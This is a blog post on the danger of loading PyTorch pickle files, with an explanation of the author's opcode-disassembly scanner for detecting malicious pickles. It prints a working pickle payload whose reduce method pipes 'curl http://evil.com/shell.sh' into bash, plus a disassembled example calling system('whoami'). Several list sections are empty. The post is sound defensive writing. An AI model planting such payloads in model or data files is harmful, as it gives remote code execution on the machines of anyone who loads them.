# Your PyTorch Model File Can Execute Arbitrary Code — Here's How I Built a Scanner to Detect It

> Source: <https://dev.to/pooja_kiran_e3e03bf9ffeed/your-pytorch-model-file-can-execute-arbitrary-code-heres-how-i-built-a-scanner-to-detect-it-5cec>
> Published: 2026-05-19 03:02:18+00:00

Every time you run torch.load("model.pt"), you're executing arbitrary Python code. Not "could theoretically execute" — actually executing. The pickle format that
PyTorch uses for serialization has a built-in code execution mechanism, and it's trivial to exploit.
I built a tool to detect this. Here's what I learned.
The Attack: 4 Lines of Code
import pickle, os
class Backdoor:
def reduce(self):
return (os.system, ("curl http://evil.com/shell.sh | bash",))
payload = pickle.dumps(Backdoor())
That's it. When someone loads this pickle — whether it's disguised as a model checkpoint, a dataset, or a config file — the command executes. No warnings. No prompts.
Full RCE.
The reduce method tells pickle how to reconstruct an object. But "reconstruct" means "call this function with these arguments." Any function. Any arguments.
** Why This Matters for ML**
ML models are distributed as serialized files:
In 2023, HuggingFace found malicious pickles in uploaded models. This isn't theoretical — it's happening.
How Detection Works: Opcode Disassembly
Python's pickletools module can disassemble pickle bytecode without executing it. Here's what a malicious pickle looks like at the opcode level:
PROTO 4
FRAME 25
SHORT_BINUNICODE 'nt' ← module name (os on Windows)
SHORT_BINUNICODE 'system' ← function name
STACK_GLOBAL ← load nt.system as callable
SHORT_BINUNICODE 'whoami' ← argument
TUPLE1 ← pack into tuple
REDUCE ← CALL the function
STOP
The key insight: STACK_GLOBAL loads a callable by module + name, and REDUCE executes it. If the module is os, subprocess, socket, or builtins — it's malicious.
My Scanner:
I built Model-Supply-Chain-Auditor (https://github.com/poojakira/Model-Supply-Chain-Auditor) to parse these opcodes and flag dangerous patterns:
from src.scanners import scan_pickle_bytes
result = scan_pickle_bytes(suspicious_data)
print(result.risk_level) # "malicious"
print(result.findings) # ["DANGEROUS import: nt.system", "Code execution via REDUCE"]
It handles pickle protocols 0-5, including the protocol 4+ STACK_GLOBAL pattern where module and name are pushed to the stack separately.
What I Got Wrong Initially
On Windows, os.system pickles as nt.system. On Linux, it's posix.system. My first version only checked for os — missed both platform-specific variants. Lesson: always
test on actual bytecode output, not what you think it should be.
The Defense: Model Signing
Detection is reactive. The proactive defense is cryptographic signing:
If the signature doesn't match, don't load it.
What This Doesn't Solve
The Takeaway:
If you're downloading model files from the internet:
The ML community is slowly moving toward safer serialization. Until then, every .pt file is a potential attack vector.
Code: github.com/poojakira/Model-Supply-Chain-Auditor (https://github.com/poojakira/Model-Supply-Chain-Auditor)
